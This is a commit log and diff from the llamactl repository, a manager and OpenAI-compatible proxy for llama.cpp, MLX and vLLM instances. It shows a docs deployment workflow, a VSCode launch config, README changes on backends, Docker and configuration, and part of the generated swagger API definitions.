146 Commits

Author SHA1 Message Date
92cb57e816 Merge pull request #48 from lordmathis/fix/command-environment
fix: Pass host environment to instances
2025-09-28 21:40:50 +02:00
0ecd55c354 Start with host environment for instances 2025-09-28 21:37:48 +02:00
b4c17194eb Merge pull request #47 from lordmathis/fix/nil-context
fix: Initialize context before building command
2025-09-28 20:59:30 +02:00
808092decf Initialize context in Start method for command execution 2025-09-28 20:51:11 +02:00
12bbf34236 Merge pull request #46 from lordmathis/feat/env-vars
feat: Add support for passing env vars to instances
2025-09-28 15:42:02 +02:00
9a7255a52d Refactor Docker support section in README for clarity and conciseness 2025-09-28 15:31:50 +02:00
97a7c9a4e3 Detail env var support in docs 2025-09-28 15:29:43 +02:00
fa9335663a Parse backend env vars from env vars 2025-09-28 15:22:01 +02:00
d092518114 Update documentation 2025-09-28 15:10:35 +02:00
ffa0a0c161 Remove ZodFormField and BasicInstanceFields components 2025-09-28 14:42:10 +02:00
1fbf809a2d Add EnvironmentVariablesInput component and integrate into InstanceSettingsCard 2025-09-28 14:42:10 +02:00
c984d95723 Add environment variable support to instance options and command building 2025-09-28 14:42:10 +02:00
50e1355205 Add environment field to BackendSettings for improved configuration 2025-09-28 14:42:10 +02:00
7994fd05b3 Merge pull request #44 from BobbyL2k/fix/rel-dir-config
fix: InstancesDir and LogsDir not being relative path to DataDir when not set
2025-09-27 21:33:00 +02:00
Anuruth Lertpiya
f496a28f04 fix: InstancesDir and LogsDir not being relative path to DataDir when not set 2025-09-27 18:14:25 +00:00
f9371e876d Merge pull request #43 from BobbyL2k/fix/config-path
fix: llamactl reads config file per documentation
2025-09-27 19:32:13 +02:00
Anuruth Lertpiya
3a979da815 fix: llamactl reads config file per documentation
- Added logging to track config file reading operations
- llamactl now properly reads config files from the expected locations ("llamactl.yaml" and "config.yaml" under current directory)
2025-09-27 17:03:54 +00:00
a824f066ec Merge pull request #42 from lordmathis/feat/docker-backends
feat: Add support for dockerized backends
2025-09-25 23:07:24 +02:00
2cd9d374a7 Add Docker badge to UI 2025-09-25 23:04:24 +02:00
031d6c7017 Update Docker command arguments for llama-server and vllm with volume mounts 2025-09-25 22:51:51 +02:00
282344af23 Fix docker command args building 2025-09-25 22:51:40 +02:00
bc9e0535c3 Refactor command building and argument handling 2025-09-25 22:05:46 +02:00
2d925b473d Add Docker support documentation and configuration for backends 2025-09-24 22:15:21 +02:00
ba0f877185 Fix tests 2025-09-24 21:35:44 +02:00
840a7bc650 Add Docker command handling for backend options and refactor command building 2025-09-24 21:34:54 +02:00
76ac93bedc Implement Docker command handling for Llama, MLX, and vLLM backends 2025-09-24 21:31:58 +02:00
72d2a601c8 Update Docker args in LoadConfig and tests to include 'run --rm' prefix 2025-09-24 21:27:51 +02:00
9a56660f68 Refactor backend configuration to use structured settings and update environment variable handling 2025-09-24 20:31:20 +02:00
78a483ee4a Merge pull request #41 from lordmathis/fix/docs-release
fix: Refactor docs workflow to trigger on version tags
2025-09-23 22:35:05 +02:00
cdcef7c7ae Refactor docs workflow to trigger on version tags 2025-09-23 22:32:02 +02:00
6f5d886089 Merge pull request #40 from lordmathis/feat/system-info
feat: rework system info dialog
2025-09-23 22:11:42 +02:00
e3bf8ac05a Update SystemInfo dialog 2025-09-23 22:05:31 +02:00
edf0575925 Replace SystemInfoDialog with BackendInfoDialog and update related references 2025-09-23 21:44:04 +02:00
71a48aa3b6 Update server API functions to use /backends/llama-cpp path 2025-09-23 21:28:23 +02:00
30e40ecd30 Refactor API endpoints to use /backends/llama-cpp path and update related documentation 2025-09-23 21:27:58 +02:00
322e1c5eb7 Merge pull request #39 from lordmathis/feat/instance-dialog
feat: Redesign create/edit instance dialog
2025-09-23 21:14:34 +02:00
2cbd666d38 Redesign create/edit instance dialog 2025-09-23 21:11:00 +02:00
9ebc05fa3a Merge pull request #38 from lordmathis/feat/instance-card
feat: Redesign instance card
2025-09-23 19:48:20 +02:00
05e4335389 Fix instance management tests 2025-09-23 19:45:45 +02:00
850cf018e3 Refactor BackendBadge component 2025-09-23 19:20:53 +02:00
9c3da55c5d Improve InstanceCard layout 2025-09-23 18:12:58 +02:00
16d311a3d0 Merge pull request #37 from lordmathis/lordmathis-patch-1
fix: Set default docs version
2025-09-23 13:48:53 +02:00
32f58502de Update docs.yml 2025-09-23 13:46:58 +02:00
788f5a2246 Merge pull request #36 from lordmathis/lordmathis-patch-1
fix: Run docs build job on every update
2025-09-23 13:21:53 +02:00
37f464007f Update docs.yml 2025-09-23 13:19:54 +02:00
84d994c625 Merge pull request #35 from lordmathis/chore/docs-update
chore: Update docs
2025-09-22 23:24:12 +02:00
120875351f Fix image paths for MkDocs rendering in readme_sync.py 2025-09-22 23:22:27 +02:00
3a63308d5f Update error descriptions in API documentation for clarity 2025-09-22 22:39:01 +02:00
46622d2107 Update documentation and add README synchronization 2025-09-22 22:37:53 +02:00
ebc82c37aa Merge pull request #34 from lordmathis/feat/vllm-backend
feat: Implement vLLM backend
2025-09-22 21:58:19 +02:00
48b3a39dfe Move badges in instance card 2025-09-22 21:54:04 +02:00
c10153f59f Add BackendBadge component and integrate it into InstanceCard 2025-09-22 21:48:33 +02:00
588b025fb1 Handle empty responses for JSON endpoints in apiCall function 2025-09-22 21:39:44 +02:00
6dcf0f806e Fix VLLM command placeholder formatting 2025-09-22 21:30:59 +02:00
184d6df1bc Fix vllm command parsing 2025-09-22 21:25:50 +02:00
313666ea17 Fix missing vllm proxy setup 2025-09-22 20:51:00 +02:00
c3ca5b95f7 Update BuildCommandArgs to use positional argument for model and adjust tests accordingly 2025-09-22 20:32:03 +02:00
2c86fc6470 Update api referrence 2025-09-21 22:16:56 +02:00
785915943b Update api docs 2025-09-21 22:03:07 +02:00
55765d2020 Add vLLM backend support to documentation and update instance management instructions 2025-09-21 21:57:36 +02:00
6ff9aa5470 Remove vLLM backend implementation specification document 2025-09-21 21:38:10 +02:00
501afb7f0d Refactor form components and improve API error handling 2025-09-21 21:33:53 +02:00
b665194307 Add vLLM backend support to webui 2025-09-21 20:58:43 +02:00
7eb59aa7e0 Remove unused JSON unmarshal test and clean up command argument checks 2025-09-19 20:46:25 +02:00
64842e74b0 Refactor command parsing and building 2025-09-19 20:23:25 +02:00
34a949d22e Refactor command argument building and parsing 2025-09-19 19:59:46 +02:00
ec5485bd0e Refactor command argument building across backends 2025-09-19 19:46:54 +02:00
9eecb37aec Refactor MLX and VLLM server options parsing and args building 2025-09-19 19:39:36 +02:00
c7136d5206 Refactor command parsing logic across backends to utilize a unified CommandParserConfig structure 2025-09-19 18:36:23 +02:00
4df02a6519 Initial vLLM backend support 2025-09-19 18:05:12 +02:00
02fdae24ee Merge pull request #33 from lordmathis/feat/doc-versioning
feat: Docs versioning
2025-09-18 21:07:04 +02:00
9a8647775d Setup docs versioning 2025-09-18 21:04:11 +02:00
3081a1986b Merge pull request #32 from lordmathis/feat/mlx-backend
feat: Implement mlx-lm backend
2025-09-18 20:34:04 +02:00
6a580667ed Remove LlamaExecutable checks from default and file loading tests 2025-09-18 20:30:26 +02:00
2a20817078 Remove redundant LlamaExecutable field from instance configuration in tests 2025-09-18 20:29:04 +02:00
5e2d237887 Update project description for clarity and consistency in README 2025-09-18 20:21:30 +02:00
84c3453281 Refactor features section in README for improved clarity and organization 2025-09-18 20:14:03 +02:00
8006dd3841 Fix formatting in README for consistency in feature descriptions 2025-09-18 20:03:19 +02:00
8820dc1146 Enhance documentation for MLX backend support 2025-09-18 20:01:18 +02:00
11296bc5f8 Update README to include MLX backend support and enhance usage instructions 2025-09-18 19:34:40 +02:00
5121f0e302 Remove PythonPath references from MlxServerOptions and related configurations 2025-09-17 21:59:55 +02:00
587be68077 Add MLX backend support with configuration and parsing enhancements 2025-09-16 22:38:39 +02:00
cc5d8acd92 Refactor instance and manager tests to use BackendConfig for LlamaExecutable and MLXLMExecutable 2025-09-16 21:45:50 +02:00
154b754aff Add MLX command parsing and routing support 2025-09-16 21:39:08 +02:00
63fea02d66 Add MLX backend support in CreateInstanceOptions and validation 2025-09-16 21:38:33 +02:00
468688cdbc Pass backend options to instances 2025-09-16 21:37:48 +02:00
988c4aca40 Add MLX backend config options 2025-09-16 21:14:19 +02:00
1f25e9d05b Merge pull request #31 from lordmathis/feat/parse-command
feat: Implement command parsing in Create Instance
2025-09-15 22:18:39 +02:00
1b5934303b Enhance command parsing in ParseLlamaCommand and improve error handling in ParseCommandRequest 2025-09-15 22:12:56 +02:00
ccabd84568 Add margin to textarea in ParseCommandDialog for improved spacing 2025-09-15 21:36:24 +02:00
e7b06341c3 Enhance command parsing in ParseLlamaCommand 2025-09-15 21:29:46 +02:00
323056096c Implement llama-server command parsing and add UI components for command input 2025-09-15 21:04:14 +02:00
cb1669f853 Merge pull request #30 from lordmathis/dependabot/npm_and_yarn/webui/npm_and_yarn-f5c1666f0c
Bump vite from 7.0.5 to 7.1.5 in /webui in the npm_and_yarn group across 1 directory
2025-09-14 10:47:38 +02:00
dependabot[bot]
a5d1f24cbf Bump vite in /webui in the npm_and_yarn group across 1 directory
Bumps the npm_and_yarn group with 1 update in the /webui directory: [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).


Updates `vite` from 7.0.5 to 7.1.5
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v7.1.5/packages/vite)

---
updated-dependencies:
- dependency-name: vite
  dependency-version: 7.1.5
  dependency-type: direct:development
  dependency-group: npm_and_yarn
...

Signed-off-by: dependabot[bot] <support@github.com>
2025-09-09 21:38:38 +00:00
92f0bd02f2 Merge pull request #29 from lordmathis/lordmathis-patch-1
chore: Switch main dashboard screenshot
2025-09-04 22:54:06 +02:00
0a16f617ad Add files via upload 2025-09-04 22:47:14 +02:00
e2f2b721e1 Merge pull request #28 from lordmathis/docs/user-guide
docs: Add mkdocs based user documentation
2025-09-03 23:29:09 +02:00
8c121dd28c Add create instance screenshot and update managing instances documentation 2025-09-03 23:23:55 +02:00
5eada9b6ce Replace main screenshot 2025-09-03 23:09:50 +02:00
ef1a2601fb Update managing-instances.md with new HuggingFace repository and file examples 2025-09-03 23:04:11 +02:00
3013a343f1 Update documentation: remove Web UI guide and adjust navigation links 2025-09-03 22:47:15 +02:00
969b4b14e1 Refactor installation and troubleshooting documentation for clarity and completeness 2025-09-03 21:11:26 +02:00
56756192e3 Fix formatting in configuration.md 2025-09-02 22:05:01 +02:00
131b1b407d Update api-referrence 2025-09-02 22:05:01 +02:00
81a6c14bf6 Update api docs 2025-09-02 22:05:01 +02:00
b08f15c5d0 Remove misleading advanced section 2025-09-02 22:05:01 +02:00
92af14b350 Improve index.md 2025-09-02 22:05:01 +02:00
b51974bbf7 Imrove getting started section 2025-09-02 22:05:01 +02:00
0b264c8015 Fix typos and consistent naming for Llamactl across documentation 2025-09-02 22:05:01 +02:00
bd31c03f4a Create initial documentation structure 2025-09-02 22:05:01 +02:00
7675271370 Merge pull request #27 from lordmathis/feat/separate-backend-options
feat: Separate backend options from common instance options
2025-09-02 22:03:35 +02:00
d697f83b46 Update GetProxy method to use BackendTypeLlamaCpp constant for backend type 2025-09-02 21:56:38 +02:00
712d28ea42 Remove port marking logic from CreateInstance method 2025-09-02 21:56:25 +02:00
0fd3613798 Refactor backend type from LLAMA_SERVER to LLAMA_CPP across components and tests 2025-09-02 21:19:22 +02:00
4f6bb6292e Implement backend configuration options and refactor related components 2025-09-02 21:12:14 +02:00
d9542ba117 Refactor instance management to support backend types and options 2025-09-01 21:59:18 +02:00
9a4dafeee8 Merge pull request #26 from lordmathis/feat/lru-eviction
feat: Implement least recently used instance eviction
2025-08-31 12:44:06 +02:00
9579930a6a Simplify LRU eviction tests 2025-08-31 11:46:16 +02:00
447f441fd0 Move LRU eviction to timeout.go 2025-08-31 11:42:32 +02:00
27012b6de6 Split manager tests into multiple test files 2025-08-31 11:39:44 +02:00
905e685107 Add LRU eviction tests for instance management 2025-08-31 11:30:57 +02:00
d6d4792a0c Skip eviction for instances without a valid idle timeout 2025-08-31 00:59:26 +02:00
da26f607d4 Update README to enhance resource management details and add configuration options for max running instances and LRU eviction 2025-08-31 00:56:35 +02:00
894f3c3213 Refactor StartInstance method to improve max running instances check 2025-08-31 00:14:29 +02:00
c1fa0faf4b Add LastRequestTime method and LRU eviction logic for instance management 2025-08-30 23:59:37 +02:00
4581d67165 Enhance instance management: improve on-demand start handling and add LRU eviction logic 2025-08-30 23:13:08 +02:00
58cb36bd18 Refactor instance management: replace CanStartInstance with IsMaxRunningInstancesReached method 2025-08-30 23:12:58 +02:00
68253be3e8 Add CanStartInstance method to check instance start conditions 2025-08-30 22:47:15 +02:00
a9f1c1a619 Add LRU eviction configuration for instances 2025-08-30 22:26:02 +02:00
8fdebb069c Merge pull request #25 from lordmathis/fix/stopping-deadlock
fix: Server stopping deadlock
2025-08-30 22:12:07 +02:00
fdd46859b9 Add environment variables for development configuration in launch.json 2025-08-30 22:04:52 +02:00
74495f8163 Refactor Shutdown method to improve instance stopping logic and avoid deadlocks 2025-08-30 22:04:43 +02:00
8ec36dd1b7 Merge pull request #24 from lordmathis/feat/max-running-instances
feat: Implement max running instances constraint and refactor instances status
2025-08-28 20:45:27 +02:00
c4ed745ba9 Fix comparison operators in useInstanceHealth hook 2025-08-28 20:43:41 +02:00
9d548e6dda Remove wrong MaxRunningInstancesError type 2025-08-28 20:42:56 +02:00
41d8c41188 Introduce MaxRunningInstancesError type and handle it in StartInstance handler 2025-08-28 20:07:03 +02:00
7d5c68e671 Add launch configuration for Go server in VSCode 2025-08-28 19:19:55 +02:00
e319731239 Remove unnecessary read locks from GetStatus and IsRunning methods 2025-08-28 19:19:28 +02:00
b698c1d0ea Remove locks from SetStatus 2025-08-28 19:08:20 +02:00
227ca7927a Refactor SetStatus method to capture onStatusChange callback reference before unlocking mutex 2025-08-28 18:59:26 +02:00
0b058237fe Enforce maximum running instances limit in StartInstance method 2025-08-27 21:18:38 +02:00
ae37055331 Add onStatusChange callback to instance management for status updates 2025-08-27 20:54:26 +02:00
a8f3a8e0f5 Refactor instance status handling on the frontend 2025-08-27 20:11:21 +02:00
b41ebdc604 Set instance status to Failed when restart conditions are not met 2025-08-27 19:47:36 +02:00
1443746add Refactor instance status management: replace Running boolean with InstanceStatus enum and update related methods 2025-08-27 19:44:38 +02:00
615c2ac54e Add MaxRunningInstances to InstancesConfig and implement IsRunning method 2025-08-27 18:42:34 +02:00
86 changed files with 8285 additions and 3095 deletions

103
.github/workflows/docs.yml vendored Normal file
View File

@@ -0,0 +1,103 @@
name: Build and Deploy Documentation
on:
push:
branches: [ main ]
tags: [ 'v*' ]
pull_request:
branches: [ main ]
paths:
- 'docs/**'
- 'mkdocs.yml'
- 'docs-requirements.txt'
permissions:
contents: write
pages: write
id-token: write
concurrency:
group: "pages"
cancel-in-progress: false
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Build documentation
run: |
mkdocs build --strict
deploy-dev:
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main' && github.event_name == 'push'
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Configure Git
run: |
git config --global user.name "${{ github.actor }}"
git config --global user.email "${{ github.actor }}@users.noreply.github.com"
- name: Deploy development version
run: |
mike deploy --push --update-aliases dev latest
# Set dev as default if no default exists
if ! mike list | grep -q "default"; then
mike set-default --push dev
fi
deploy-release:
runs-on: ubuntu-latest
if: startsWith(github.ref, 'refs/tags/v')
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Configure Git
run: |
git config --global user.name "${{ github.actor }}"
git config --global user.email "${{ github.actor }}@users.noreply.github.com"
- name: Deploy release version
run: |
VERSION=${GITHUB_REF#refs/tags/}
mike deploy --push --update-aliases $VERSION stable
mike set-default --push stable

4
.gitignore vendored
View File

@@ -32,4 +32,6 @@ go.work.sum
# .vscode/
node_modules/
dist/
dist/
__pycache__/

19
.vscode/launch.json vendored Normal file
View File

@@ -0,0 +1,19 @@
{
// Use IntelliSense to learn about possible attributes.
// Hover to view descriptions of existing attributes.
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
"version": "0.2.0",
"configurations": [
{
"name": "Launch Server",
"type": "go",
"request": "launch",
"mode": "auto",
"program": "${workspaceFolder}/cmd/server/main.go",
"env": {
"GO_ENV": "development",
"LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
},
}
]
}

View File

@@ -129,6 +129,50 @@ Use this format for pull request titles:
- Use meaningful component and variable names
- Prefer functional components over class components
## Documentation Development
This project uses MkDocs for documentation. When working on documentation:
### Setup Documentation Environment
```bash
# Install documentation dependencies
pip install -r docs-requirements.txt
```
### Development Workflow
```bash
# Serve documentation locally for development
mkdocs serve
```
The documentation will be available at http://localhost:8000
```bash
# Build static documentation site
mkdocs build
```
The built site will be in the `site/` directory.
### Documentation Structure
- `docs/` - Documentation content (Markdown files)
- `mkdocs.yml` - MkDocs configuration
- `docs-requirements.txt` - Python dependencies for documentation
### Adding New Documentation
When adding new documentation:
1. Create Markdown files in the appropriate `docs/` subdirectory
2. Update the navigation in `mkdocs.yml`
3. Test locally with `mkdocs serve`
4. Submit a pull request
### Documentation Deployment
Documentation is automatically built and deployed to GitHub Pages when changes are pushed to the main branch.
## Getting Help
- Check existing [issues](https://github.com/lordmathis/llamactl/issues)

240
README.md
View File

@@ -2,30 +2,39 @@
![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
**Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
**Unified management and routing for llama.cpp, MLX and vLLM models with web dashboard.**
## Why llamactl?
## Features
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Idle Timeout Management**: Automatically stop idle instances after a configurable period
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts
### 🚀 Easy Model Management
- **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
- **On-Demand Instance Start**: Automatically launch instances upon receiving API requests
- **State Persistence**: Ensure instances remain intact across server restarts
![Dashboard Screenshot](docs/images/screenshot.png)
### 🔗 Universal Compatibility
- **OpenAI API Compatible**: Drop-in replacement - route requests by instance name
- **Multi-Backend Support**: Native support for llama.cpp, MLX (Apple Silicon optimized), and vLLM
- **Docker Support**: Run backends in containers
**Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
**Choose LM Studio if**: You prefer a polished desktop GUI experience with easy model management
### 🌐 User-Friendly Interface
- **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
- **API Key Authentication**: Separate keys for management vs inference access
### ⚡ Smart Operations
- **Instance Monitoring**: Health checks, auto-restart, log management
- **Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
- **Environment Variables**: Set custom environment variables per instance for advanced configuration
![Dashboard Screenshot](docs/images/dashboard.png)
## Quick Start
```bash
# 1. Install llama-server (one-time setup)
# See: https://github.com/ggml-org/llama.cpp#quick-start
# 1. Install backend (one-time setup)
# For llama.cpp: https://github.com/ggml-org/llama.cpp#quick-start
# For MLX on macOS: pip install mlx-lm
# For vLLM: pip install vllm
# Or use Docker - no local installation required
# 2. Download and run llamactl
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
@@ -42,15 +51,27 @@ llamactl
### Create and manage instances via web dashboard:
1. Open http://localhost:8080
2. Click "Create Instance"
3. Set model path and GPU layers
4. Start or stop the instance
3. Choose backend type (llama.cpp, MLX, or vLLM)
4. Set model path and backend-specific options
5. Configure environment variables if needed (optional)
6. Start or stop the instance
### Or use the REST API:
```bash
# Create instance
# Create llama.cpp instance
curl -X POST localhost:8080/api/v1/instances/my-7b-model \
-H "Authorization: Bearer your-key" \
-d '{"model": "/path/to/model.gguf", "gpu_layers": 32}'
-d '{"backend_type": "llama_cpp", "backend_options": {"model": "/path/to/model.gguf", "gpu_layers": 32}}'
# Create MLX instance (macOS)
curl -X POST localhost:8080/api/v1/instances/my-mlx-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "mlx_lm", "backend_options": {"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit"}}'
# Create vLLM instance with environment variables
curl -X POST localhost:8080/api/v1/instances/my-vllm-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "vllm", "backend_options": {"model": "microsoft/DialoGPT-medium", "tensor_parallel_size": 2}, "environment": {"CUDA_VISIBLE_DEVICES": "0,1", "NCCL_DEBUG": "INFO"}}'
# Use with OpenAI SDK
curl -X POST localhost:8080/v1/chat/completions \
@@ -85,16 +106,65 @@ go build -o llamactl ./cmd/server
## Prerequisites
### Backend Dependencies
**For llama.cpp backend:**
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
# Quick install methods:
# Homebrew (macOS)
brew install llama.cpp
# Or build from source - see llama.cpp docs
# Or use Docker - no local installation required
```
**For MLX backend (macOS only):**
You need MLX-LM installed:
```bash
# Install via pip (requires Python 3.8+)
pip install mlx-lm
# Or in a virtual environment (recommended)
python -m venv mlx-env
source mlx-env/bin/activate
pip install mlx-lm
```
**For vLLM backend:**
You need vLLM installed:
```bash
# Install via pip (requires Python 3.8+, GPU required)
pip install vllm
# Or in a virtual environment (recommended)
python -m venv vllm-env
source vllm-env/bin/activate
pip install vllm
# Or use Docker - no local installation required
```
## Docker Support
llamactl supports running backends in Docker containers - perfect for production deployments without local backend installation. Simply enable Docker in your configuration:
```yaml
backends:
llama-cpp:
docker:
enabled: true
vllm:
docker:
enabled: true
```
**Requirements:** Docker installed and running. For GPU support: nvidia-docker2 (Linux) or Docker Desktop with GPU support.
For detailed Docker configuration options, see the [Configuration Guide](docs/getting-started/configuration.md).
## Configuration
llamactl works out of the box with sensible defaults.
@@ -106,6 +176,32 @@ server:
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {} # Environment variables for the container
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {} # Environment variables for the container
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
@@ -113,7 +209,8 @@ instances:
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
llama_executable: llama-server # Path to llama-server executable
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
@@ -121,7 +218,6 @@ instances:
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
@@ -129,103 +225,7 @@ auth:
management_keys: [] # Keys for management endpoints
```
<details><summary><strong>Full Configuration Guide</strong></summary>
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
### Configuration Files
#### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux/macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
### Configuration Options
#### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
#### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
#### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
</details>
For detailed configuration options including environment variables, file locations, and advanced settings, see the [Configuration Guide](docs/getting-started/configuration.md).
## License

View File

@@ -19,6 +19,243 @@ const docTemplate = `{
"host": "{{.Host}}",
"basePath": "{{.BasePath}}",
"paths": {
"/backends/llama-cpp/devices": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of available devices for the llama server",
"tags": [
"backends"
],
"summary": "List available devices for llama server",
"responses": {
"200": {
"description": "List of devices",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/backends/llama-cpp/help": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the help text for the llama server command",
"tags": [
"backends"
],
"summary": "Get help for llama server",
"responses": {
"200": {
"description": "Help text",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/backends/llama-cpp/parse-command": {
"post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Parses a llama-server command string into instance options",
"consumes": [
"application/json"
],
"produces": [
"application/json"
],
"tags": [
"backends"
],
"summary": "Parse llama-server command",
"parameters": [
{
"description": "Command to parse",
"name": "request",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/server.ParseCommandRequest"
}
}
],
"responses": {
"200": {
"description": "Parsed options",
"schema": {
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
},
"400": {
"description": "Invalid request or command",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
},
"500": {
"description": "Internal Server Error",
